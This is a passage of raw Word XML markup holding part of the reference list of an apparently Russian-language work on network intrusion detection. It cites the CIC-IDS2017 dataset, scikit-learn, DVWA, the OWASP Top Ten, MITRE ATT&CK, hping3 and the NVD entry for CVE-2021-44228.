          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onnx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дата обращения: 01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD41360" w14:textId="68F9F546"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Canadian Institute for Cybersecurity. CIC-IDS2017: Intrusion Detection Evaluation Dataset [</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</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ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]. — University of New Brunswick, 2017. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://www.unb.ca/cic/datasets/ids-2017.html</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дата</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обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 20.03.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B080FF" w14:textId="52286A66"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scikit-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>learn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> developers. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StandardScaler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — scikit-learn documentation [</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F4C" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://scikit learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html</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дата</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обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B527BD" w14:textId="54A7EED4" w:rsidR="00F60519" w:rsidRPr="008D5BC0" w:rsidRDefault="00F60519" w:rsidP="00772345">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA Project. Damn Vulnerable Web Application [</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</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ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/digininja/DVWA</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дата</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обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF1679" w14:textId="1EB1A3DF" w:rsidR="00F60519" w:rsidRPr="00DD2F4C" w:rsidRDefault="00CE4D59" w:rsidP="00772345">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP Foundation. OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Top</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ten</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2025 [</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]. — 2025. — </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>owasp</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ten</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дата</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 25.03.2026)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3B170" w14:textId="3043E127"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE Corporation. MITRE ATT&amp;CK Enterprise Matrix [</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</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ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]. — 2025. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/</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дата</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обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 15.04.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AAE615" w14:textId="1456E352" w:rsidR="00CE4D59" w:rsidRPr="009534A2" w:rsidRDefault="00CE4D59" w:rsidP="00772345">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Электронный ресурс]. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://www.hping.org/</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дата обращения: 01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76532B66" w14:textId="49152BBE" w:rsidR="009534A2" w:rsidRPr="009534A2" w:rsidRDefault="009534A2" w:rsidP="00772345">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>National Vulnerability Database. CVE-2021-44228 Detail [</w:t>
      </w:r>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]. — URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44228 (</w:t>
      </w:r>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дата</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 05.06.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849B003" w14:textId="26230860" w:rsidR="00CE4D59" w:rsidRPr="008D5BC0" w:rsidRDefault="00CE4D59" w:rsidP="00772345">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
